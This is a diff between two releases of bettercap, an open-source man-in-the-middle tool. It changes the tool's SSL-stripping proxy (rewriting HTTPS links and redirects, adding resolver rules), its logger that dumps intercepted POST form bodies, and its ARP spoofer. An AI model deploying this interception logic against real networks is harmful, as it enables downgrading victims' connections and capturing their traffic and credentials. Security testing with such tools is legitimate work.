+    ( request.path.include?('.ico') or request.path.include?('favicon') )
   end
 
   # If the +response+ is a redirect to a HTTPS location, patch the +response+ and
@@ -215,7 +239,7 @@ class Strip
     if response['Location'].start_with?('https://')
       original, stripped = StrippedObject.process( response['Location'] )
 
-      @stripped << StrippedObject.new( request.client, original, stripped )
+      add_stripped_object StrippedObject.new( request.client, original, stripped )
 
       # If MAX_REDIRECTS is reached, the 'Location' header will be used.
       response['Location'] = stripped
@@ -259,15 +283,23 @@ class Strip
     rescue; end
 
     unless links.empty?
-      Logger.debug "[#{'SSLSTRIP'.green} #{request.client}] Stripping #{links.size} HTTPS link#{if links.size > 1 then 's' else '' end} inside '#{request.to_url}'."
+      Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Stripping #{links.size} HTTPS link#{if links.size > 1 then 's' else '' end} inside '#{request.to_url}'."
 
       links.each do |l|
         original, stripped = l
-        @stripped << StrippedObject.new( request.client, original, stripped )
+        add_stripped_object StrippedObject.new( request.client, original, stripped )
         response.body.gsub!( original, stripped )
       end
     end
   end
+
+  private
+
+  def add_stripped_object( o )
+    @stripped << o
+    # make sure we're able to resolve the stripped domain
+    @resolver.add_rule( o.stripped_hostname, IPSocket.getaddress( o.original_hostname ) )
+  end
 end
 
 end

data/lib/bettercap/proxy/stream_logger.rb

@@ -48,8 +48,6 @@ class StreamLogger
   # Given +proto+ and +port+ return the network service name if possible.
   def self.service( proto, port )
     if @@services.nil?
-      Logger.info 'Preloading network services ...'
-
       @@services = { :tcp => {}, :udp => {} }
       filename = File.dirname(__FILE__) + '/../network/services'
       File.open( filename ).each do |line|
@@ -126,7 +124,7 @@ class StreamLogger
       msg << "\n[#{'BODY'.green}]\n\n"
 
       case request['Content-Type']
-      when 'application/x-www-form-urlencoded'
+      when /application\/x-www-form-urlencoded.*/i
         msg << self.dump_form( request )
 
       when 'gzip'
@@ -146,8 +144,6 @@ class StreamLogger
   # Log a HTTP ( HTTPS if +is_https+ is true ) stream performed by the +client+
   # with the +request+ and +response+ most important informations.
   def self.log_http( request, response )
-    is_https   = request.port == 443
-    request_s  = "#{is_https ? 'https' : 'http'}://#{request.host}#{request.url}"
     response_s = "( #{response.content_type} )"
     request_s  = request.to_url( request.post?? nil : @@MAX_REQ_SIZE )
     code       = response.code[0]
@@ -158,7 +154,7 @@ class StreamLogger
       response_s += " [#{response.code}]"
     end
 
-    Logger.raw "[#{self.addr2s(request.client)}] #{request.verb.light_blue} #{request_s} #{response_s}"
+    Logger.raw "[#{self.addr2s(request.client)}] #{request.method.light_blue} #{request_s} #{response_s}"
     # Log post body if the POST sniffer is enabled.
     if Context.get.post_sniffer_enabled?
       self.log_post( request )

data/lib/bettercap/proxy/streamer.rb

@@ -20,21 +20,21 @@ class Streamer
   def initialize( processor )
     @processor = processor
     @ctx       = Context.get
-    @sslstrip  = SSLStrip::Strip.new
+    @sslstrip  = SSLStrip::Strip.new if @ctx.options.sslstrip
   end
 
   # Return true if the +request+ was stripped.
   def was_stripped?(request, client)
     if @ctx.options.sslstrip
-      request.client, request.client_port = get_client_details( !( request.port == 443 ), client )
+      request.client, _ = get_client_details( client )
       return @sslstrip.was_stripped?(request)
     end
     false
   end
 
   # Redirect the +client+ to a funny video.
-  def rickroll( client, is_https )
-    client_ip, client_port = get_client_details( is_https, client )
+  def rickroll( client )
+    client_ip, client_port = get_client_details( client )
 
     Logger.warn "#{client_ip}:#{client_port} is connecting to us directly."
 
@@ -44,10 +44,9 @@ class Streamer
   # Handle the HTTP +request+ from +client+.
   def handle( request, client, redirects = 0 )
     response = Response.new
-    is_https = request.port == 443
-    request.client, request.client_port = get_client_details( is_https, client )
+    request.client, _ = get_client_details( client )
 
-    Logger.debug "Handling #{request.verb} request from #{request.client}:#{request.client_port} ..."
+    Logger.debug "Handling #{request.method} request from #{request.client} ..."
 
     begin
       r = nil
@@ -59,7 +58,7 @@ class Streamer
         # call modules on_pre_request
         @processor.call( request, nil )
 
-        self.send( "do_#{request.verb}", request, response )
+        self.send( "do_#{request.method}", request, response )
       else
         response = r
       end
@@ -67,7 +66,7 @@ class Streamer
       if response.textual?
         StreamLogger.log_http( request, response )
       else
-        Logger.debug "[#{request.client}] -> #{request.host}#{request.url} [#{response.code}]"
+        Logger.debug "[#{request.client}] -> #{request.to_url} [#{response.code}]"
       end
 
       if @ctx.options.sslstrip
@@ -77,7 +76,7 @@ class Streamer
           if redirects < SSLStrip::Strip::MAX_REDIRECTS
             return self.handle( request, client, redirects + 1 )
           else
-            Logger.info "[#{'SSLSTRIP'.yellow} #{request.client}] Detected HTTPS redirect loop for '#{request.host}'."
+            Logger.info "[#{'SSLSTRIP'.red} #{request.client}] Detected HTTPS redirect loop for '#{request.host}'."
           end
         end
       end
@@ -87,7 +86,7 @@ class Streamer
 
       client.write response.to_s
     rescue NoMethodError => e
-      Logger.warn "Could not handle #{request.verb} request from #{request.client}:#{request.client_port} ..."
+      Logger.warn "Could not handle #{request.method} request from #{request.client} ..."
       Logger.exception e
     end
   end
@@ -95,20 +94,15 @@ class Streamer
   private
 
   # Return the +client+ ip address and port.
-  def get_client_details( is_https, client )
-    unless is_https
-      client_port, client_ip = Socket.unpack_sockaddr_in(client.getpeername)
-    else
-      _, client_port, _, client_ip = client.peeraddr
-    end
-
+  def get_client_details( client )
+    _, client_port, _, client_ip = client.peeraddr
     [ client_ip, client_port ]
   end
 
   # Use a Net::HTTP object in order to perform the +req+ BetterCap::Proxy::Request
   # object, will return a BetterCap::Proxy::Response object instance.
   def perform_proxy_request(req, res)
-    path         = req.url
+    path         = req.path
     response     = nil
     http         = Net::HTTP.new( req.host, req.port )
     http.use_ssl = ( req.port == 443 )

data/lib/bettercap/spoofers/base.rb

@@ -92,7 +92,7 @@ private
           break
       end
 
-      Logger.debug "Spoofing #{@ctx.targets.size} targets ..."
+      # Logger.debug "Spoofing #{@ctx.targets.size} targets ..."
 
       update_targets!
 
@@ -106,7 +106,7 @@ private
 
   # Get the MAC address of the gateway and update it.
   def update_gateway!
-    hw = Network.get_hw_address( @ctx.ifconfig, @ctx.gateway )
+    hw = Network.get_hw_address( @ctx, @ctx.gateway )
     raise BetterCap::Error, "Couldn't determine router MAC" if hw.nil?
     @gateway = Network::Target.new( @ctx.gateway, hw )
 
@@ -118,9 +118,9 @@ private
     @ctx.targets.each do |target|
       # targets could change, update mac addresses if needed
       if target.mac.nil?
-        hw = Network.get_hw_address( @ctx.ifconfig, target.ip )
+        hw = Network.get_hw_address( @ctx, target.ip )
         if hw.nil?
-          Logger.warn "Couldn't determine target #{ip} MAC address!"
+          Logger.warn "Couldn't determine target #{target.ip} MAC address!"
           next
         else
           target.mac = hw

data/lib/bettercap/version.rb

@@ -12,7 +12,7 @@ This project is released under the GPL 3 license.
 =end
 module BetterCap
   # Current version of bettercap.
-  VERSION = '1.3.8'
+  VERSION = '1.3.9'
   # Program banner.
   BANNER = File.read( File.dirname(__FILE__) + '/banner' ).gsub( '#VERSION#', "v#{VERSION}")
 end

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: bettercap
 version: !ruby/object:Gem::Version
-  version: 1.3.8
+  version: 1.3.9
 platform: ruby
 authors:
 - Simone Margaritelli
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2016-02-13 00:00:00.000000000 Z
+date: 2016-02-16 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: colorize
@@ -148,6 +148,7 @@ files:
 - lib/bettercap/network/servers/httpd.rb
 - lib/bettercap/network/services
 - lib/bettercap/network/target.rb
+- lib/bettercap/network/validator.rb
 - lib/bettercap/options.rb
 - lib/bettercap/proxy/certstore.rb
 - lib/bettercap/proxy/module.rb